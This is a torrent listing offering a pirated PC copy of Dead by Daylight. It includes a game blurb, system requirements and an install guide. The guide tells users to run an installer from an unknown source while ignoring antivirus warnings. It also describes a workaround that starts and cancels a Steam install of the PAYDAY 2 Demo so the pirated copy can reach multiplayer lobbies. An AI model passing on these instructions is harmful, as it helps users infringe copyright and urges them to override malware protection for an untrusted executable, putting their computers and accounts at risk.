Dead by Daylight PC torrent
Dead by Daylight
Developer: Behaviour Interactive
Publisher: Starbreeze Publishing
Genre: Action (Survival horror) / Multiplayer, 3D / 1st Person / 3rd Person
Language: EN / RU / Multi12
Treatment: Not required
Release Date: 2016
Dead by Daylight is a multiplayer (4vs1) horror game where one player takes on the role of the savage Killer, and the other four players play as Survivors, trying to escape the Killer and avoid being caught, tortured and killed.
Survivors play in third-person and have the advantage of better situational awareness. The Killer plays in first-person and is more focused on their prey.
The Survivors' goal in each encounter is to escape the Killing Ground without getting caught by the Killer - something that sounds easier than it is, especially when the environment changes every time you play.
- Survive Together… Or Not - Survivors can either cooperate with the others or be selfish. Your chance of survival will vary depending on whether you work together as a team or if you go at it alone. Will you be able to outwit the Killer and escape their Killing Ground?
- Where Am I? - Each level is procedurally generated, so you’ll never know what to expect. Random spawn points mean you will never feel safe as the world and its danger change every time you play.
- A Feast for Killers - Dead by Daylight draws from all corners of the horror world. As a Killer you can play as anything from a powerful Slasher to terrifying paranormal entities. Familiarize yourself with your Killing Grounds and master each Killer’s unique power to be able to hunt, catch and sacrifice your victims.
- Deeper and Deeper - Each Killer and Survivor has their own deep progression system and plenty of unlockables that can be customized to fit your own personal strategy. Experience, skills and understanding of the environment are key to being able to hunt or outwit the Killer.
- Real People, Real Fear - The procedural levels and real human reactions to pure horror makes each game session an unexpected scenario. You will never be able to tell how it’s going to turn out. Ambience, music, and chilling environments combine into a terrifying experience. With enough time, you might even discover what’s hiding in the fog.
Minimum System Requirements
CPU: Intel Core i3-4170 or AMD FX-8120
RAM: 8 GB
OS: 64-bit Operating Systems (Windows 7, Windows 8.1)
Video Card: DX11 Compatible GeForce GTX 460 1GB or AMD HD 6850 1GB
Free Disk Space: 25 GB
Recommended System Requirements
CPU: Intel Core i3-4170 or AMD FX-8300 or higher
RAM: 8 GB
OS: 64-bit Operating Systems (Windows 7, Windows 8.1 or above)
Video Card: DX11 Compatible GeForce 760 or AMD HD 8800 or higher with 4GB of RAM
Free Disk Space: 25 GB
How to Install
1. Run the installation file.
2. Follow the instructions of the installation program, not paying attention to possible warnings of anti-virus protection.
3. You must have a Steam account.
4. Install and register, if you do not have one.
5. After you need to activate PAYDAY 2 Demo (tablet features):
6. You can find it through the Steam search and start the installation (wait 10 seconds and cancel the installation).
7. Or open the start menu - execute (perform) - paste steam: // install / 251040 - ok
8. A window opens in Steam (downloading PAYDAY 2 Demo). Click Next - Next (wait for 10 seconds and cancel) paste steam: // install / 251040
Because this is a pirated version of the game, entering the session from the first time is not guaranteed - sometimes it takes several attempts to join the lobby